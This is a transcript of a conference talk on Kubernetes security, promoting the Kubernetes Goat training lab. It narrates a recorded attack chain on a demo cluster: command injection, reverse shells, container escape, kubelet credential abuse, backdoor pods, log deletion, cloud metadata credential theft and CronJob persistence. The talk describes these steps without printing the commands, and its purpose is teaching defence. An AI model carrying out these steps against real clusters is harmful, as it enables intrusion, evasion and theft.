 Cool. Welcome everyone. I am definitely a bit nervous, like full packed room. So I think today we will be focusing on mainly understanding how we can learn Kubernetes security and cloud native security. Of course, there is a lot of buzz around like at least the booths place, right? Like a lot of people trying to sell the security tools, right? A bit about me, definitely I'm not from any company, so I don't think that I'm not selling any tool here. So I work as an independent security consultant, primarily around Kubernetes and cloud native space. I've been past experience basically training to teach and trying people around the bunch of conferences, like Black Hat, Defcon, Eusenix and some of the others. Apart from that, I've been trying to commit a community drive back by giving some open source projects. Like one of them today we're going to see is called Kubernetes Goat, which is a fun place to learn Kubernetes security. Yes, apart from that, I keep trying to learn new things. So that's why you see me never ending learner. So feel free to like stop by and say if something I say is wrong, right? I'm still learning new things. So with that, let's quickly look at the agenda, what we're going to do like for at least next 30 minutes or so. We will start thinking about why exactly we need Kubernetes or cloud native security because there is a lot of people going through all this incubation process and the graduation and security assessments and stuff, right? But definitely we kind of see from the real world experience, I've been doing at least hacking of Kubernetes cluster for almost five to six years, quite early days of that option. We will see some of the road map how these kind of can hacks map back to real world clusters. And hopefully that is one part I'm a bit nervous. I used to do always live hacking because of some constraint I had to record. So let's see some hacking of how all the stages of Kubernetes like from gaining from completely no, no visibility to cluster takeover, which means different parts of hackers life in the Kubernetes, right? So we will also see some of the mappings in the real world frameworks, like a vast top 10 Mitre attack framework, if you're someone coming from the security background, right? And also we will see how you can go back and try learning these things so that you kind of hack your clusters basically to secure them, right? So pretty much that's it. So let's start with why exactly we need Kubernetes and cloud native security, right? So I just wanted to start a bit of survey, maybe not like a very high level, just a simple form of like, okay, raise the hands if you say like, Oh, that is the thing which you are doing. How many of you run like pretty much in the production, like the bleeding edge of the newest, the Kubernetes versions? Like maybe 1.26 or 2.5, at least. Ah, quite a lot. Cool. So how many of you at least running the production workloads in Kubernetes? That's amazing. That's awesome, right? So when we started like back in, to take you back history, like in 2016, I started learning about Kubernetes and trying to come from security background completely the way it is changed. And we will see some of them like how it evolved, right? I'm really sorry if anyone from security team, I don't know how many of you from security background are doing security work in the companies? Okay, sorry, trying to like basically blame you, but yeah, don't mind. So some of the reasons actually, right, why we wanted to discuss is one of the biggest challenge we have seen in the security industry is lack of knowledge, because most Kubernetes and new concepts is not even understandable by security teams, right? How do you product if you don't understand the technology, right? So if you look at this example, right? So there is a basically cluster got hacked and you go to a security team. Oh, we got hacked by some Monero crypto or like whatever the crypto mining. They said, okay, go ahead and delete the pod or maybe bring a new node, right? So if you look at Kubernetes, you can't just go delete a pod or fix a node, right? It's not how you gonna fix the security issues. So we kind of see this just definitely not love. As I said, I don't want to definitely blame security teams. It's the biggest gap is we miss a lot of knowledge in the technology. So unless we don't understand how the systems work, definitely we can't secure them, right? So that is one of the biggest gap we have seen. The second thing is understanding the technology gap, right? So there is a ton of things coming out. If you look at the landscape, I don't think so. How many of you are like at least know some of the things tools out there within the the CNCF landscape. It's huge. It's growing, right? So the landscape is quite heavy and people can't catch up, right? So that's one of the biggest reason it's very hard to protect or like build security layers on the Kubernetes or cloud media ecosystem, right? Then if you look at the biggest thing is the maturity, right? It's not at all growing. I mean, it's definitely growing in terms of the projects and the scope and the features. Think about the security, right? How it is evolving. What kind of security roadmap you see from the Kubernetes or even the companies and the vendors are the tools, right? So this is something which definitely attackers love this, right? Like, oh, this is how we can leverage because this shiny object which is lying in the production workloads. So another biggest thing is which I think mostly not just for security teams. So this migrated all the way close to 123. There is a new release every four months of Kubernetes upstream saying that, oh, we have new release of 1.25. Why don't you migrate? Because a lot of bugs got patched and you need to move to the upstream, right? So it is not able to catch up for the at least live or the security people even develop streams, right? They are like, okay, they have to apply it. They have to migrate all these changes and move on to the next thing, right? And what about the popular hacks? Like, I think it has seen like a crypto mining happening all around the world. Like, there are container escapes happening all around the world, right? So by the time you patch all your vulnerabilities from the scanners, by the time you have a ton of more vulnerabilities, right? So there is no time to patch your all vulnerabilities of like whatever the security team is saying that, oh, there is some bugs in your container images, right? So these are some of the examples. So one of the biggest reasons is to improve the experience, right? Of the like either it can users, developers of the operations teams. So if you don't understand the technology, basically, you can't secure it. That's what I say, right? Like you need to understand to solve those problems. So the question is, can we do something about the community security then? So yes, definitely we can. At least there is a lot of work done by CNC of tax security and bunch of the people around the community, which is really awesome. Actually, like if you look at this, this is one of the threat modeling. I think it doesn't go with not just CNC of our communities, anything, most of the companies doing threat modeling, right? This is a very good start to identify what is your risk? And what is the security posture? And what is your critical assets? It can be data, it can be systems and whatever, right? So this is just one thing, right? So there are better approaches which you can use to secure thing like for example, attack trees, again, this is one of the project from CNC of tax security, they try to showcase you what kind of layers you can map it back to when it is security attacks from attackers point of view, right? So these are really good. I mean, if you're someone adopting them and improving them and trying to fix your security issues at different layers, and also they have a bunch of white papers and documentation. But if you go back to the security teams are real world, you need a practical experience, right? These are pretty good in the paper. Like how do you say that this is a theoretical vulnerability? Can you hack them really? Right? That's what you have a business case. Okay, you all saying good, this is going to get container escape. Can you say that it is really going to happen? Is it happening in the real world? So that is what we're going to see today. So we kind of look at like, are these enough to start getting started with the Kubernetes security, right? So we will look at a very simple high level, something called I call attack path. And some companies call in different variations by the way cyber kill chain or kill chain or whatever the thing. So we will look at a very simple attack kill path by the way, definitely you can't read and understand sorry for that. This is a basic kill chain I can think of for the Kubernetes, right? The one thing you have to take away is there is a lot of possibilities to get into the Kubernetes cluster at various layers of attacks, right? So we will be going at some of these attacks at different stages from completely external facing Kubernetes cluster to gaining initial access by hacking into the cluster from there, maybe executing into the cluster, maybe it can be container or pod from there, how you can literally move or escalate out of the container to node, maybe not to another node, another node to complete cluster takeover, right? Or do you want to make sure your blue team doesn't want to detect or you security teams should not detect these attacks. So there are way to bypass us. So we will look at some of them. And we will also see how we can literally move, which means it can be across the cluster. It can even be on the cluster, right? The whole idea we wanted to do is to make some impact, right? So the impact could be various ways you wanted exfiltrate the data of the cluster or you wanted to just do crypto mining or make more billing for your computer, right? So there can be any impact, but the kill chain is pretty much similar, right? You have a lot of parts and a lot of possibilities, right? So this looks all good. So we kind of quickly look at this very simple demo. I really miss doing live hacking definitely because if I do this, it takes more than 40 minutes. So I had to record it and do it to X speed, but I would be super happy to show you outside as well. So let's go back. Let's play. So I'll try to just navigate through this and explain you some of the concepts. What exactly I'm trying to do, right? So we'll start with the completely initial cluster. Is the font visible bit back set? I'm really sorry. I tried to do regard like with the font. Hi. But if you say something, I can zoom in and try to play the video, right? So yeah, what we are trying to do is we just looking at pattern three node Kubernetes cluster. So what I'm trying to do is getting the IP addresses of the three worker nodes, okay? So these three worker nodes running a bunch of workloads of your production, right? And I'm also taking the master node IP, which is basically your Kubernetes API server, right? So as an attacker, I start with this. Okay, I don't know anything about your cluster's workload. I have this is the this is the entry point for me, right? So if you look at like red teams are attackers, that is what they have to get started, right? So let's see what they can do. So I will be starting with a simple and map scan. As I said, most of the security knowledge is not like going to go waste if because of new technology, the only thing is you need to understand this technology. All of your security skills still can be applicable here. Once you map it back, okay, this is a pod, maybe this is a different thing, right? So what I'm trying to do if you look at here closely, maybe I'll just start that I can say. So what I'm trying to do here is I'm doing a simple and map scan on the entire range of node ports, right? If you look at the node ports of Kubernetes, which is completely exposed to outside, if there is no firewall, basically all of your API gateways, service mesh, all of these firewalls, fancy commercial vendors is get bypassed, right? Completely exposing that at a node level. So we have these seen these attacks in a bunch of engagements when I was doing consulting. By the way, most of these attacks you see here is come from real world hacks. I try to simulate them and keep it so that you can learn. So if you look at them, there are a bunch of node ports exposed from the cluster as an attacker. Oh, this looks interesting. Maybe there is an application. So if you start looking at application, they have a bunch of applications which is exposed to node port, which is completely outside of the Kubernetes cluster and anyone can access on the internet without firewall without API remit leads or a gateway or anything. Okay, as an attacker, I'll just start using an application. Oh, I found it. So as an attacker, as a hacker, I just try to see how the application works, right? Okay, it looks like there is a simple functionality looks like a ping, right? So maybe I can see try giving some system commands. Like what I'm trying to do here is I'm just giving a parameter called ID with the semicolon, which means the unique separator, right? Or Linux operator. What it means is because this application is vulnerable to like application security attack like remote code execution, right? So I'm trying to chain off attacks, right? So I'm using the application security vulnerability to basically do command injection in the container, right? So now you see this information gathering and I gained the knowledge of the systems and I was able to gain into the system, right? I got execution into the pod, right? So, okay, now I'm here. Okay, I got an execution stage. I have an RCE. I'm already in your Kubernetes cluster in one of the pod or container, right? That's a pretty cool, right? Isn't it for attacker's point of view? So that's not enough, right? From me, the if you look at red team are like a hacking teams. So they focus on missions or goals, right? What is the mission for me? If something I get access to the cluster at me, maybe that is a goal of mine, right? I'll stop it there. Or maybe my goal is to I wanted exfiltrate all your secrets or maybe data, right? So I'll based on goal approach. I wanted to proceed next, right? So once I'm inside a node or like basically, sorry, pod or container. So I wanted to integrate more. What can I do from there? So from here, you can think of like the below system you see here is a hacker box, which means think of this as an attacker machine. And this is something I'm trying to get some information and run bunch of comments, right? So what I'm trying to do is I'm getting the attacker box or attacker machine IP so that I can use this when I'm trying to do some payloads, reversal or anything. So rather than I'm keep using the shell or the application, I'm trying to plant a simple reversal so that I get a proper shell back so that I can play and do whatever the things I want from my terminal. So what I'm trying to do here is I just did a simple reversal. I listen to the port from the container and just got the reversal back. So now I basically have the pod access from my computer, right? As an attacker. So God, cool. So from there, I just wanted to enumerate more. What can I do more and what kind of things I can get out of the Kubernetes cluster? So I'll start enumerating. Okay, what kind of kernel it is running? What kind of operating system it is running container? If you look at this, I didn't even know it is container or the VM. So I kind of looking at what kind of network interfaces are there. So does it really running in a container or something? So I'm just looking at C groups. Okay, looking at it is a Kubernetes pod, right? Which means pretty cool. Like I'm inside a Kubernetes container now, right? So from there, I kind of see, oh, there is a lot of processes. I don't think so. Kubernetes or container is supposed to have a lot of processes, right? Just need to have one process of the container. So this looks bit shady or interesting from a dagger's point of view, right? So what I do is I'll go ahead and see one of the process. Oh, this doesn't look like running in a container. It looks like from the system process, right? So maybe I have to definitely have understanding of the Kubernetes and the containers knowledge here. Okay, this could be dash dash pod equal to host, which means you're passing all your host processes to the container. Maybe it is required for some of the tracing tools, right? Our process monitoring tools. So these are some of the real world hacks, by the way. So we have required unseen these kind of attacks when some of the tools required caps is P trace, and you just need processes, you can do process injection attack to even container escape, right? So then we also looking at what are the moan parts, right? So I'm trying to showcase you definitely various ways you can look at attacks, but definitely you don't see all of these vulnerabilities in one pod. So think of these kind of possibilities in various places. So I'm also looking at what kind of DNS resolutions and do we have any extra capabilities? Looking at it, we got pretty much everything, right? Caps is admin cap Netra. So we have pretty much all the access and understanding. So once as attacker, I enumerated all the knowledge out of the Kubernetes. So then my idea is, can I escape out of the container? Like if you look at here, I'm just using CH root because there is a file system mounted from the host system. I just got escaped. So if you look at this, I just escaped out of the container to the one of the node, right? So I literally moved or like privilege escalator, if you see now from completely outside nowhere to a container container to now node. So I'm inside of one of your worker node. So pretty much think of me like your cubelet, right? So once I'm inside your cubelet, okay, what can I do? Because that is not my goal, right? I wanted to get either cluster admin or do something more damage. So I kind of trying to see, oh, what can I do here? Oh, I have seen bunch of images. If I am someone behind a data, maybe I'll just see if any of the pod or Docker container is landing in the nodes, I'll just steal the data and go away. Right? That's my goal of the attack, right? So, but if someone wanted to take over the complete cluster, maybe they have further more goals, right? So I'll start looking at more. So you can also, by the way, do different ways of attacks. I just showing in another way, like using in a center with the the UPC, UTC namespace. So what I'm trying to do now here is because I'm already inside one of the node, can I leverage something which is already use of Kubernetes node? So if you think about Kubernetes architecture, there is something called cubelet, which is required to talk to the APS server. So I'm trying to leverage the cubelet configuration to mimic that as attacker. Oh, I'm the cubelet. Can you give me something like this? So I'm trying to use the same cubelet configuration and going and talking to the Kubernetes. So if you see cubelet, cubelet will get parts in the node. I'm not getting because I don't have the configuration or the credentials of the cubelet. So the configuration credentials are available in the cubelet.cubeconfig. So what I have to do is I just pass this configuration to the cube cuddle, like I'm just passing this cubelet configuration and just asking the APS server, can you give me these parts or can you do this something, right? So if you look at it, pretty much we are able to get the parts, which means whatever cubelet can do the permissions, we can able to do as an attacker, right? Which means you can able to ask the imperative API using like, Art, can I get parts? Which means it'll tell using that configuration and the secrets you can able to do or not. Yes, you can able to get parts. And yes, you can able to relate parts, right? So it also give dash dash list, what are the verbs or objectives you can do with the credentials, but even she can do all of these things, right? So as I said, I've been doing for a year system. Initially, there was no node admission restriction plugin, which means using this, I could have deployed another pod in another node and land on to another node, which means I literally move from one node to another node. Basically, I can completely take over your cluster, right? But due to that node admission plugin, we are restricted and bounded to only one node now, right? That's a definitely good security fix, right? But attackers not going to stop there. So they kind of see what could be possible so that I can literally move across another node. So if you look at here, basically, I'm trying to show now defense evasion, which means if you are someone blue team or sock team, same team wanted to detect me, I try to see just, can I delete their logs so that they don't detect me? Can I just delete some kind of hidden way so that they'll never see me lying there, right? So I just trying to delete some of the pod logs. So there are a bunch of ways, by the way, some of them is like removing the pod logs are removing the container logs, because these get just forwarded from your Fluent D or Fluent B2, the same tools like Splunk or Yelka Stack, whatever the thing, and your blue team get detected and triggered and alert, right? So one of them is that or you can even change the configurations because you're already in the root, right? You never wanted to forward certain logs or something. So basically, you're playing God mode in the node level, right? So once you are inside here, there are a bunch of defense techniques by the evasion. This is one of them. So what I'm trying to do is now I have now able to escape out of the container, I wanted to laterally move. Okay, I know that I can get everything in this node, but I wanted to have access to another node where there is a sensitive workloads. It could be something like you are maybe PCI workloads or something, right? So what I'm trying to do now here is, okay, I'm already inside this node, which starts and with something ZD, ZD, then I wanted to get access to something like Zi, right? That is a different node in the Kubernetes, right? So what I'm trying to look at is now is can I get the node labels, right? So if you look at, there is a very native feature of Kubernetes, something called Tolerations and Tains and also node selector. As a attacker, this is where, again, as I said, you need to understand the technology to hack because I know there is a something concept called node selector. As a attacker, I leverage the same feature, go and deploy a port in another node where I select certain workloads, right? So what I'm trying to do is just trying to get the list of nodes. So if you look at another attack path, which is by the way interesting, and we have seen this real one, if you are someone adopted Kubernetes early days, there was no concept of our back, right? So if someone get into the service, and basically you are God, like service cluster admin, which what, by the way, got exploited in besides conference CTF, which is basically, they were trying to run the CTF in Kubernetes cluster, someone basically got the cluster admin, basically, entire CTF is over. Basically, you got the cluster admin, right? So then what we are trying to do is we leverage this service account token, which is basically a JWT token at the end, right? So we kind of use this simple JWT token, like I'm just double checking, right? It really is what kind of things has. So it's a simple core app service account, and it has bunch of privileges. And I'm just trying to use this service account to see what kind of privileges I have, right? So I'm just trying to get some of the text rather than me typing every time. So what I'm trying to do here is basically, I'm mounting the APA server, which I'm going to talk, and what is the service account, and which namespace I'm in, and what is the certificate file on the token, that's it, right? So basically, I exported all these things, and I basically run the simple call command to basically can get the namespaces, right? Or now can I talk to the APA server? Looks like the service account token is working fine, right? So now what I'm trying to do is rather than just like going and triggering namespaces and can I get a pod or something, so I will also go ahead and ask the APA server with these credentials, can I be able to create a simple pod using a backdoor, right? So what I'm going to do now here is if you look at this, so I'm just creating a pod rather than ML files, I'm just using the JSON because I had to make a call request to the APA server. So basically converted all your ML into JSON. And one interesting thing which you see here is what I'm doing is I'm going to replace the node selector and the node which I wanted to land as attacker. So what it helps me to do is basically it helps me to basically go rather than and land in the same node every time which I have attack. So I wanted to land in the node which I wanted to take over, right? So I'm just deploying a backdoor pod which gives me again reversal in another node which I wanted to literally move, right? So if you just put that here, so I will go ahead and update that node which we just wanted to land and I'll go ahead and make a same call request because I have all the credentials to talk to the APA server and I have pretty much access to deploy a pod, right? And once you see this, it's pretty much deployed. It's in pending state and I just wanted to double check. So I'll go back to again because I in a host system, I have access. So I'll go ahead and run kubectl getpods maybe. Yeah, I just trying to set the path. Okay, it's not in the default name space because the pod is by default in the core app name space. You can see the backdoor pod got deployed. So that is not interesting, but we wanted to know which node it is deployed, right? So if you just do dash wide, you can see this, it got deployed in the GI, which means basically we give a host privilege, privileged access. So pretty much you are God on another route, like, which means you literally moved to another node and you have root on the host system, right? So this is pretty much you've seen the kill chain, like we started from initial discovery, exact escape, move on to the different nodes. So there are a bunch of attacks you can even literally move without network security policies. If there are no network security policies as you already know, like you can basically talk to any of the services. This is one of the widely exploited things like, right, people just go and like grab internal services because they are not protected with MTLS or maybe they just think that it is name space bounded or logically segregated, right? So this is very common as well. So now what we are trying to do is we will also looking up at another way. So there is a very old concept called static parts in communities before demon sets were not like really in the communities. So this is used to be helpful for running demon set, which means each node should run one of the node container, like for example, logging or something. So they used to use static parts when there was no demon set. So still the future is there. I think this is recently flagged as well. So they're going to duplicate or something. So which is basically I'm trying to leverage as attacker, just keep a static part in the manifest. Basically, even though someone trying to delay it apart, basically I keep spinning up because it's coming from not APS server, it's coming from a static part, right? No Kubernetes APS server is controlling this as attacker. I'm controlling at the host level, right? It's a full blown like a bypass for that, right? So I believe I don't remember. I don't want you to quote. So these locks might not be even available in APS server if you wanted to monitor them, right? Which means another way for attacker to hide, right? So this is something quite interesting and useful as well, right? I try to delay it. You can see this. It's popping up because it's not a pod, right? It's managed by a static part, right? So this is one of the again, defense evasion technique or like a persistence, if you want to land and keep on in the cluster. And there are a bunch of ways you can persist, right? The good old technique of adding your SSH key to authorized keys or cron job, put a backdoor, like there are ton of techniques you wanted to persist in the cluster. But these are not going to work in the distributed system. If you look at, right, you just say destroy and all these gone, your backdoors. So how do you keep the backdoors then in the Kubernetes, right? So I came up with very interesting approach. By the way, this is I'm trying to showcase another lateral moment approach before I show a cool backdoor, how you can do this. So there are a bunch of these most of the modern services depend on something called service metadata, which is like instant metadata IP API, right? They use some IP address called 169254169254, which is a IP address reserved for the, this kind of thing, right? So as an attacker, I can even leverage these kind of metadata. By the way, this Shopify got hacked entire clusters due to the same reason, right? So there might be sensitive keys, which is attached because certain nodes required these API endpoints. As an attacker, even I not only literally move within the cluster, I can even literally move across your cloud providers, right? If you think about this, I'm just trying to take this access key or secret key or whatever the credential, in this case, I just planted them so that you can understand the real world impact, right? I'm just using that to get a color identity of the profile, whatever the hacker just steal the tokens. Pretty much you have access to the URAWs now, whatever the credentials has the permission, right? So you literally moving across the cloud, not just Kubernetes, we are impacting now, right? So think about these kind of attacks at scale, like these are, by the way, not saying there is a threat model, this could be possible. This is a real world hacker, I'm showing you live, right? So not live, sorry, recorded, sorry for that. So yeah, there are a bunch of attacks you can do. If you think about exfiltration, as I said, right? That is one of the way you can steal, but there is attackers behind something like crypto miners, like if you look at the previous one, I was sorry, I think I just moved fast. So what I wanted to show was previous one, how you can basically make more resource hijacking if you don't have resource limits and limit ranges, those kind of things, right? As an attacker, if I run crypto miner, like I'm just trying to run a stress engine to show the same rather than mining my own nodes, right? So I'm just saying here, you see the huge memory thing, like you can see a lot of memory get consumed, like 6MV, now you see started almost getting the so much hit, right? So basically crypto miners are got very smart, by the way, these days, you can even allocate how much C group resources you want so that you don't get detected by your commercial vendors. So some of them got very, very fancy, especially crypto miners, right? Yeah, this is another way you can basically do. So this is what I wanted to show loss attacks, sorry for taking too much time, but yeah, this is something basically how you do Kubernetes style backdoors, right? Because those are not persistent, you want to be distributed, right? So this is something I'm leveraging the Kubernetes native feature called cron job, which means you basically spin up a cron job and thinking like a system job, like Celium or something, like mass creating to avoid defense and deploying any cube system name space, which means it's the way most of the stuff happens. And if you see some interesting things happening is some of them is concurrency and the parallelism, I'll explain them. So what I'm trying to do is basically I just setting up a attacker IP, basically I'm grabbing my attacker box IP. So this is the IP I wanted to get a reversal every time, right? So I'll go ahead and create a simple container and I'm going to run a NC to get a shell back. Then basically, I'm going to run a listener. Each time I'll go ahead and apply this job as a backdoor. Basically, you see the parts and you already got the connection back, which means you have a reversal for your container all the time, even though someone delays the part, it'll get upstream. It's a very persistent shell. Think of this, even Kubernetes nodes get deleted, you still have a shell. Even because that's a part of Kubernetes native, not part of node, right? Even if you upgrade the cluster, you have a shell back because it's a very persistent. So there are a ton of attacks. I think these are some of them I just showcased from some of the experience of me hacking some of the clusters, right? So I just wanted to stop here because I can keep talking and hacking. So let's go back to some of the things where we wanted to talk, right? Because we are almost running out of time also, right? So, oh, sorry. I don't want to play this again. Yeah. Because you've seen a lot of the interesting hacks, right? I don't know if anything you learned, but yeah, it was definitely fun for me to hack them. So how can you practice them, right? So that you can go and protect these clusters or even like, see if you have these kind of vulnerabilities. So that's the whole education piece is missing. At least some of the things we have seen in the real world, right? So that is where I wanted to introduce to you a project called Kubernetes Got, which is one of the fun projects I have created basically, which has a bunch of intentionally vulnerabilities like I have shown hacks and the real world security tools also like Celium Tetragon or Falco, Kyberno, right? All of the CNC of tools, right? So how you can use these kind of security things to learn and play in a real world like just like an hacker, right? So you can able to understand and see how you can hack and protect these clusters, right? By the very big disclaimer, please do not run this in your production workloads. This has a bunch of vulnerabilities as you've seen. Basically, you are giving me a backdoor tomorrow to hack your cluster, right? So please do not ever run on your production clusters, right? So, okay, this all looks fancy. Maybe I'm not a security person. Can I still use Kubernetes Got, right? So definitely it's catered to a bunch of people. Like if you have someone coming from hackers background, like attackers or a team, you can just learn security or offensive game of the communities, right, or CNC of side. And someone different as you can able to learn these techniques so that you can able to defend or prevent what kind of locks to look, what kind of attacks to detect, right? If you are someone completely developers or DevOps team, so you can also learn and understand a simple misconfiguration of node port. This all started, right? You could have made that all of this could have prevented or maybe some of those, right? So even I have seen it is adopted by companies like Microsoft Defender Research. They use Kubernetes goes to test their product is really working, right? So they are able to detect these attack. So we have seen a really good use cases. These are bunch of the scenarios you can learn and play in Kubernetes code. We have 22 scenarios of live hacking and defense. So you can able to go and try out yourself and learn the Kubernetes security, right? So how can I set up? Definitely you can go ahead and spin up any of the cluster, even including K3S or Kind, you can able to run up and running with the Kubernetes code project, right? So as simple as you just go ahead and get blown and bash and deploy. Oh, sorry. Yeah, you should be able to see these parts up and running. This is a home page. How do you get like basically you have a simple home page to help you guide? So one of the biggest lack of thing in the industry is documentation. So that is what we focused on. At least when building a project, right? So someone like you basically can head over to a project called Kubernetes Goat. This is the welcome page, by the way. I'm trying to find my mouse. So you basically pretty much have fantastic documentation, like why the project is created, getting started, how you can do and how you can able to before even learn Kubernetes, how you can learn Kubernetes and some of the examples. And also some of the cheat sheets of the commands and also some of the mapping to OVAS top 10, some of the real world practices and which scenario you can play so that you can able to fix the only promise you are back, right? So it also maps back to a very popular framework called Mitre, like the kill chain of the cyber kill chain, right? Like how they use the attack framework, right? So a bunch of these scenarios are available. So you can also look at each scenario. So we have like, for example, container escape, right? So if you click on the scenario, so you can able to have each and every detail attack, right? Okay, now I just showed if you look at we got a container access, we use CH root, you escaped out of the container and you use the Kubelet config, you escaped to another lateral node. So you have pretty much step by step guidance, like how we can attack and what are the goals, some of the fun hints and some of the solutions walk through as well. So pretty much it's like a fancy tool, right? So I would highly recommend to give it a try and we have some examples with event tetragon, right? How we can detect certain attacks or like what are the things we have seen in real world and maybe you can go and fix these things are, right? So and we also had like a bunch of reports from the open source tools, how they can detect these attacks in real world and can they detected or what kind of things missing as well. So yeah, give it a try. And it's pretty much you, we have a discord as well. Someone wanted to try it out and pretty much it has a bunch of feedback from the community. At least these are the things. So this is one thing I wanted to give it backs to the community so that you can go back and learn and useful to practice. And as I said, these are some of the mappings and if you wanted to explore, you can go and check out this project and repository. Yeah, by the way, this is a fun talk from Microsoft about how they use Kubernetes code to basically test the defender is working really or not, detecting these attacks in Microsoft Azure Cloud by the bunch of the people use as well, like security vendors. So some of the key takeaways because almost we are end of the talk, sorry for that. A lot of gaps in the knowledge, that is one of the biggest gap in security industry and even in the modern ecosystem, right? There is ton of tools and technologies coming out day in and day out. So we need to understand the technology to solve the security problems and definitely you need to see the maturity model, right? The tool can be like super good, but it may not be matured from security point of view, right? So there is lots of resources and frameworks and tools, but they may not be practical enough. So you need to see, is it really adding value or making an impact? So basically think like a hacker, just go define like the security person, right? So this is pretty much we have pre-spread the love of Kubernetes code with the people, at least your team and other people. And I got some of the cool stickers of the Kubernetes code, very limited edition, by the way. Please grab them, I'll be here or outside anywhere you can find me. And with that, thank you so much.